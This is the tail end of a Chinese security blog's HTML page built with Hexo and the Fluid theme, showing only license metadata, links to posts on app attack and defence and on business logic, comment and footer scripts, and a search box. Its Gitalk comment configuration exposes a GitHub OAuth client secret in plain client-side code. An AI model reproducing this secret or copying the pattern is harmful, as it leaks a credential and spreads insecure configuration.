          <div>2024年9月5日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/09/15/APP%E6%94%BB%E9%98%B2/" title="APP攻防">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">APP攻防</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/08/05/%E4%B8%9A%E5%8A%A1%E9%80%BB%E8%BE%91/" title="业务逻辑">
                        <span class="hidden-mobile">业务逻辑</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://lib.baomitu.com/gitalk/1.8.0/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"Ov23liT0OJSQBYUz81HU","clientSecret":"02c5c39d96d158a8a34967805e40cb90a7b2f1cf","repo":"0z-sihn.github.io","owner":"0z-sIHN","admin":["0z-sIHN"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":true,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: '8c191f9945ce318388f310baefa4a78b'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
<div>
  <span id="timeDate">正在载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("11/10/2024 22:36:00");
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🚀已持续航行&nbsp"+dnum+"&nbsp天";  
      document.getElementById("times").innerHTML = hnum + "&nbsp时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
  }
  setInterval("createtime()",250);
  </script>
</div>

  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/diy_js/typing-effect.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
